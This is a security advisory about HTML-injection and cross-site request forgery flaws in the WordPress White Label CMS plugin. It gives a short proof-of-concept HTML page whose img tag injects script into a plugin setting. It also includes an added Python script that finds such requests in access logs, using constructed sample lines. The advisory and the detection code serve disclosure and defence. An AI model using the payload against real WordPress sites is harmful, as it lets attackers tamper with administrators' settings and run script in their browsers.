WordPress White Label CMS Plugin HTML Injection and Cross Site Request Forgery Vulnerabilities

An attacker can exploit the HTML-injection issues through a browser. To exploit the cross-site request-forgery issue, the attacker must entice an unsuspecting victim into viewing a malicious webpage.

The following exploit is available:

<html>
<title>White Label CMS CSRF</title>
<body>
<img src='http://www.example.com/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")</script><div"'>
</body>
</html>
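
One way to look for this request shape in web server access logs, as an added example that is not part of the original advisory. It assumes Combined Log Format, the site host www.example.com from the request above, and that other plugin settings share the wlcms_o_ prefix seen in the one parameter shown; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: ip, ident, user, [time], "request line", status, size, "referer"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"')
MARKUP = re.compile("[<>\"']")  # characters that can break out of an HTML attribute

SAMPLE_LOG = [  # constructed lines, not real traffic
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /wordpress/wp-admin/admin.php'
    '?page=wlcms-plugin.php&action=save&wlcms_o_developer_name='
    '%22%3E%3Cscript%3Ealert(%22fun%22)%3C/script%3E%3Cdiv%22 HTTP/1.1" 200 512 '
    '"http://attacker.invalid/page.html" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2010:10:05:00 +0000] "POST /wordpress/wp-admin/admin.php'
    '?page=wlcms-plugin.php&action=save HTTP/1.1" 302 - '
    '"http://www.example.com/wordpress/wp-admin/admin.php?page=wlcms-plugin.php" "Mozilla/5.0"',
    '192.0.2.11 - - [01/Jan/2010:10:06:00 +0000] "GET /wordpress/index.php HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0"',
]

def check_line(line, site_host):
    """Return a list of findings for one access-log line (empty if nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    params = parse_qsl(url.query, keep_blank_values=True)  # values are percent-decoded
    q = dict(params)
    # Only the plugin's settings-save request is of interest here.
    if not (url.path.endswith("/wp-admin/admin.php")
            and q.get("page") == "wlcms-plugin.php" and q.get("action") == "save"):
        return []
    findings = []
    if m["method"] == "GET":
        findings.append("settings-save-via-GET")  # state change reachable from an <img> tag
    if urlsplit(m["referer"]).hostname != site_host:
        findings.append("cross-site-or-missing-referer")
    for name, value in params:
        if name.startswith("wlcms_o_") and MARKUP.search(value):
            findings.append("markup-in-" + name)
    return findings

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(check_line(entry, "www.example.com"))
```

Access logs record only the query string, so the markup check covers GET requests like the one above; settings submitted in a POST body need to be inspected in the stored option values instead.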


 

Copyright 2010, SecurityFocus